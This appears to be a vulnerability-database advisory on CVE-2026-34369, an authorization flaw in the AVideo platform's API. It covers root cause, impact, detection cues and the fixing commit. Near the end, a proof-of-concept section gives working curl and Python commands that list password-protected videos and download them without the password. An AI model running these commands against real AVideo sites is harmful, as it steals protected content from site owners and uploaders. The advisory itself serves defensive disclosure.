
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34369 is a missing authorization vulnerability in WWBN AVideo, an open source video platform, that allows unauthenticated attackers to bypass password protection on videos by calling API endpoints directly. The get_api_video_file and get_api_video API endpoints return full video playback sources (direct MP4 URLs, HLS manifests) for password-protected videos without performing any password verification. All versions up to and including 26.0 are affected. The vulnerability was published on March 27, 2026, with a fix committed shortly after. It carries a CVSS v3.1 base score of 5.3 (Medium) (Github Advisory, Red Hat).
The root cause is CWE-862 (Missing Authorization): the password enforcement logic present in the web UI — implemented via the CustomizeUser::getModeYouTube() hook calling videoPasswordIsGood() — is only invoked during web page rendering and is entirely absent from the API code path. In get_api_video_file (plugin/API/API.php:986-1004), the sole access check is User::canWatchVideoWithAds(), which validates admin status, video active status, and subscription/PPV restrictions but never checks video_password; since password-protected videos have status 'a' (active), they pass all checks. Similarly, get_api_video (plugin/API/API.php:1635-1810) returns full video paths and sources arrays with no password verification. Notably, the proper verification function Video::verifyVideoPassword() exists in the codebase and a dedicated get_api_video_password_is_correct endpoint exists, confirming that password verification was intended but simply never wired into these endpoints (Github Advisory).
Any unauthenticated attacker can retrieve direct, playable MP4 or HLS URLs for all password-protected videos on an AVideo instance without supplying the correct password, completely nullifying the video password protection feature. The get_api_video endpoint additionally leaks which videos are password-protected (via the video_password field set to '1'), enabling targeted enumeration of protected content. This affects all consumers of the API, including mobile apps, third-party integrations, and direct API clients. There is no integrity or availability impact; the consequence is limited to confidentiality loss of protected video content (Github Advisory).
A proof-of-concept exploit is publicly available in the GitHub Security Advisory, consisting of step-by-step curl commands and Python processing that demonstrate a complete exploitation workflow requiring no authentication or special tooling (Github Advisory). There is no evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.031% (10th percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
curl -s 'https://target.com/plugin/API/get.json.php?APIName=video&rowCount=50' | \
python3 -c "
import json, sys
data = json.load(sys.stdin)
for v in data.get('response',{}).get('rows',[]):
if v.get('video_password'):
print(f'ID: {v[\"id\"]}, Title: {v[\"title\"]}, Password Protected: YES')
print(f' Direct sources: {json.dumps(v.get(\"sources\",[]) [0] if v.get(\"sources\") else \"none\")}')"get_api_video_file endpoint with the target video ID — no password parameter required:curl -s 'https://target.com/plugin/API/get.json.php?APIName=video_file&videos_id=<VIDEO_ID>'The response returns direct MP4/HLS URLs: {"error":false,"response":{"videos_id":"123","video_file":"https://target.com/videos/video_abc/video_abc_HD.mp4","sources":[{"src":"...","type":"video/mp4"}]}}
4. Download protected content: Use the returned URL to download the video directly:
curl -O 'https://target.com/videos/video_abc/video_abc_HD.mp4'/plugin/API/get.json.php?APIName=video_file&videos_id=<ID> or /plugin/API/get.json.php?APIName=video with rowCount parameters from unexpected source IPs; direct HTTP requests to video file paths (e.g., /videos/<filename>/<filename>_HD.mp4) without a preceding authenticated web session.get.json.php with APIName=video_file or APIName=video parameters from a single IP or user-agent, particularly without any prior authentication activity; subsequent direct downloads of .mp4 files from the /videos/ directory."error":false for video file requests on password-protected video IDs without a video_password parameter being supplied.The fix is implemented in commit be344206f2f461c034ad2f1c5d8212dd8a52b8c7, which adds Video::verifyVideoPassword() checks to both get_api_video_file and get_api_video before returning playback sources, and also corrects get_api_video_password_is_correct to use proper bcrypt comparison instead of direct string equality (AVideo Commit). Administrators should update their AVideo installation to a version incorporating this commit immediately. As a temporary workaround if patching is not immediately possible, implement network-level access controls (e.g., WAF rules or reverse proxy restrictions) to block unauthenticated external access to the get_api_video_file and get_api_video API endpoints, and review access logs for evidence of unauthorized API calls to these endpoints (Github Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."